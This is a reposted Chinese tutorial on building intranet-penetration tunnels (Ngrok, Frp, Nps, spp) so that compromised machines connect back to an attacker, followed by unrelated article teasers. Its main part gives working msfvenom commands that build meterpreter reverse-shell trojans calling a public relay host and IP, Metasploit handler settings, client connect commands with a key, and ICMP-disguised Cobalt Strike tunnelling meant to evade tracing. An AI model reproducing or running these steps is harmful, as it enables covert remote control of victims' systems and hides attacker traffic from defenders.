内网安全【5】隧道搭建

1.内网穿透工具

Ngrok Frp Spp Nps EW(停更) 一共是这五个

优点:穿透加密数据,中间平台,防追踪,解决网络问题

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

2.Ngrok--内网穿透--上线

(1)服务端配置:

开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道

(2)客户端连接服务端:

./sunny clientid 133328291918 //控制端连接Ngrok的服务器

(3)客户端生成后门配置监听:

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o tcp.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 8888

run

点击下面的链接注册账户然后去登录,登录完成之后点击隧道管理,开通隧道

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

下载客户端,因为攻击机是kali,所以下载linux的,此时查看状态是不在线,等客户端连接服务端之后就在线了

输入命令让客户端连接服务端

这里我们在生成木马的时候,监听地址应该写跳板机的,因为利用反向连接,目标主机找不到内网攻击机,下图可以看到写的后门会使当目标主机将权限给到这个跳板机的这个域名的时候,跳域名就会解析到刚才设置的攻击机的ip和端口。从而实现内网穿透。

隧道走的tcp,生成后门的时也要生成tcp的,ip和端口就写隧道的

本地kali开启msf监听,监听端口为生成隧道时的本地端口2222,然后服务器点击木马即可上线

3.Frp--内网穿透--上线

Frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网

(1)服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

先把frp文件放到自己的服务器上面,然后可以看到frps.ini和frpc.ini,frps.ini是服务端的配置文件,frpc.ini是客户端的配置文件

服务端的配置文件端口是默认的7000,等会在kali客户端的配置文件也应该是7000,然后两者先建立通道(不要忘记安全组把7000端口开放)

可以看到客户端也是默认的7000,上面的ip是跳板机的ip,下面的local_port是本机接受数据的ip,remote_port是跳板机用6000端口发送给kali

也就是说跳板机的安全组要开放两个端口,一个是用于连接的7000端口,一个是发送数据的6000端口,而kali的msf监听是监听本机的5555端口

启动服务端

启动客户端

来到服务端,可以看到已经成功连接

kali启动msf生成木马,ip为服务器ip,端口为6000

监听本地5555端口,接着把后门放到目标服务器,也就是飞哥的服务器,点击后门。(因为目标主机为linux的,所以这里无论生成后门还是设置监听都要弄linux的,并且还不要生成exe文件,linux无法直接执行exe文件,建议生成elf文件)

成功的上线

4.Nps--内网穿透--上线

Nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。

(1)服务端

给nps一个执行权限,然后输入命令./nps install

输入命令,运行nps           ./nps     

使用账号密码admin/123进行登录(端口号和账号密码都是可以改的,在conf目录下的nps.conf)

(2)创建客户端,生成密匙

(3)添加协议隧道,绑定指向

远程绑定5555,指向本地6666

2.客户端

(1)连接服务端

./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v

(2)生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5555 -f exe -o nps.exe

(3)监听后门

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 0.0.0.0

set LPORT 6666

run

创建一个客户端,不做限制

点击隧道--

协议就选择tcp,服务器端口就是跳板机的接受端口,目标端口就是转发到哪个ip的哪个端口,这里我们不写ip就是本机,因为我们使用kali作为服务端的,所以这里就是kali本机的6666端口去接受数据。也就是说目标点击后门会把流量转发到跳板机的5566端口,然后转发到kali的6666端口,我们生成后门的时候生成5566端口的后门,好让目标去找跳板机,然后监听就监听本地的6666端口即可。

来到kali客户端,先连接到这个服务端,后面那个密钥就是刚才生成客户端的时候的密钥

显示在线

msf生成后门

点击后门之后,成功上线

5.spp--特殊协议--上线

支持的协议:tcp、udp、udp、icmp、http、kcp、quic

支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代

(1)服务端:监听本地的icmp数据

./spp -type server -proto ricmp -listen 0.0.0.0

(2)客户端:将本地的8082给到117这8081上(TCP封装icmp)

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

(3)CS

监听器1:http 47.94.236.117 8081

监听器2:http 127.0.0.1 8082

生成后门:监听器2

这里大致过程就是利用cs监听器2生成的后门将win7的8082权限通过tcp协议移交给外网服务器的8081端口,但是因为spp项目的干扰,把tcp伪装成icmp协议发送了出去,然后服务器通过spp项目直接监听icmp的包,然后cs就会通过监听器1上线(这里cs服务端是外网的服务器)

这里我们现在服务器开启监听

在win7上面执行命令

然后cs设置两个监听器,监听器2生成后门,win7点击后门,监听器1上线。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/35182.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

计算机网络之数据通信原理(中)

上节内容传送口:数据通信原理基础 1.数据传输方式 1.1并行传输 并行传输: 字符编码的各个比特同时传输 特点: 一个比特时间内可传输一个字符,传输速度快,每个比特传输要求一个单独的信道支持,通信成本高&#xf…

Redis数据类型详解:内存中的数据结构艺术

Redis是一个高性能的键值存储数据库,以其出色的读写速度和丰富的数据结构支持而广受欢迎。在Redis中,数据以键值对的形式存储,其中键是唯一的,而值则可以是多种数据类型。本文将详细探讨Redis支持的数据类型,以及每种数…

GPU算力租用平台推荐

推荐以下几家GPU算力租用平台: 1. AWS (Amazon Web Services) EC2 - AWS提供多种GPU实例,适合不同的计算需求,如机器学习、深度学习和图形渲染等。 - 优点:全球覆盖面广,稳定性高,服务支持全面。 …

探索网络爬虫技术:原理、实践与挑战

一、引言 在数字化时代,信息如同潮水般汹涌而来。过去,我们可能依赖书籍、报纸或电视来获取信息,但这些渠道的信息量有限,而且筛选过的信息未必能满足我们的需求。如今,互联网为我们提供了海量的信息,但同…

【Sklearn驯化-聚类指标】搞懂机器学习中聚类算法评估指标,轮廓系数、戴维森堡丁指数

【Sklearn驯化-聚类指标】搞懂机器学习中聚类算法评估指标,轮廓系数、戴维森堡丁指数 本次修炼方法请往下查看 🌈 欢迎莅临我的个人主页 👈这里是我工作、学习、实践 IT领域、真诚分享 踩坑集合,智慧小天地! &#…

快来看,错过了今天就要设置为vip文章了---云原生重塑架构:AutoMQ 基于云构建十倍降本的 Kafka

Apache Kafka在数据流处理系统中的核心地位 Apache Kafka已成为大数据和流计算领域的行业事实标准,其重要性在数据流处理系统中不言而喻。随着数字化转型的加速,越来越多的企业选择基于Kafka来构建其在线业务消息传递系统,使其成为数字化转型…

一文梳理有效提升RAG效果的方法

来源:一文梳理有效提升RAG效果的方法 在大模型实际落地的时候,存在一些问题,主要集中在以下方面: 缺少垂直领域知识:虽然大模型压缩了大量的人类知识,但在垂直场景上明显存在短板,需要专业化的…

安全管理:守护数据库的堡垒(九)

引言 在前几章中,我们探讨了SQL基础、索引、事务处理、存储过程与函数以及视图等数据库核心技术,构建了坚实的数据库设计和管理基础。本章作为基础篇的最后一章,我们将聚焦于数据库安全管理,这是保障数据安全、合规性和隐私的关键…

如何通过小猪APP分发轻松实现应用内测分发

搞应用开发的朋友们,都知道内测分发这个环节有多重要。没有内测,一款应用基本上是不可能上线的。毕竟,谁也不想自己的产品在上线的那一刻就被用户吐槽得体无完肤。内测分发的好坏,直接影响到应用的质量和用户的第一印象。如何才能…

Web自动化元素定位之xpath定位【超详细】

🍅 视频学习:文末有免费的配套视频可观看 🍅 点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快 Web自动化常见的定位方式 为什么要学习定位 1.让程序操作指定元素,就必须先找到此元…

Linux文件IO深入剖析

目录 一、文件IO引发的项目血案 1、分析 一、Linux文件系统基本概念 1、文件系统接口 2、文件系统缓存 二、文件IO 访问方式概述 1、标准文件访问方式 2、直接IO 3、实现方式 4、缓存同步 5、Linux 文件IO流程图 6、血案解决 一、文件IO引发的项目血案 事件经过&am…

MTK平台Android13实现三方launcher为默认

一、前言 目前有遇到客户的定制需求,希望使用三方的launcher作为默认的launcher使用,一般情况下直接将三方launcher通过内置到系统并通过overlay机制即可很方便的实现launcher的替换,但是存在一个问题,需要增加ROM的维护成本。本文通过设备在使用前联网通过后台下发三方lau…

MetaGPT全面指南:多代理协作框架的深入解析与应用

文章目录 理解MetaGPT1.1 MetaGPT的基础1.2 MetaGPT的独特之处1.3 MetaGPT在AI领域的应用 MetaGPT的工作原理2.1 训练2.2 微调2.3 推理2.4 多代理协作的概念2.5 如何分配角色给GPTs2.6 复杂任务的完成过程 实际应用3.1 客户支持3.2 内容创作3.3 教育3.4 医疗保健3.5 在企业中的…

自签名的PDF文档证书有法律效力吗?

自签名的PDF文档证书是否具有法律效力,取决于多个因素。以下是对此问题的详细分析: 电子签名的法律效力: 根据《中华人民共和国电子签名法》的规定,电子签名可以作为电子数据,与纸质文件一样具有法律效力。这意味着&a…

【408考点之数据结构】树与二叉树的应用

树与二叉树的应用 一、树与二叉树的基本应用 树和二叉树是数据结构中的重要组成部分,具有广泛的应用。以下是树和二叉树的一些基本应用: 表达式树:用于表示算术表达式,其中叶节点是操作数,内部节点是运算符。霍夫曼…

CAS和AQS 原理

CAS(Compare And Swap)和AQS(AbstractQueuedSynchronizer)是并发编程中常用的两种同步机制。以下是它们的原理介绍: CAS(Compare And Swap) CAS是一种无锁的并发机制,主要用于解决…

Potato(土豆)一款轻量级的开源文本标注工具

项目介绍: Potato 是一款轻量级、可移植的Web文本标注工具,被EMNLP 2022 DEMO赛道接受。它旨在帮助用户快速地从零开始创建和部署各种文本标注任务,无需复杂的编程或网页设计。只需简单配置,团队即可在几分钟内启动并运行标注项目…

【论文速读】| LLAMAFUZZ:大语言模型增强的灰盒模糊测试

本次分享论文:LLAMAFUZZ: Large Language Model Enhanced Greybox Fuzzing 基本信息 原文作者:Hongxiang Zhang, Yuyang Rong, Yifeng He, Hao Chen 作者单位:University of California, Davis 关键词:模糊测试,大…

SQL面试题练习 —— 合并用户浏览行为

目录 1 题目2 建表语句3 题解 1 题目 有一份用户访问记录表,记录用户id和访问时间,如果用户访问时间间隔小于60s则认为时一次浏览,请合并用户的浏览行为。 样例数据 ------------------------ | user_id | access_time | ---------------…

云动态摘要 2024-06-27

给您带来云厂商的最新动态,最新产品资讯和最新优惠更新。 最新产品更新 veLinux 2.0 镜像邀测发布 火山引擎 2024-06-26 veLinux 2.0 镜像邀测发布 ECS支持100台实例批量续费/退订 火山引擎 2024-06-26 ECS支持100台实例批量续费/退订 弹性伸缩支持目标追踪规则(邀测) …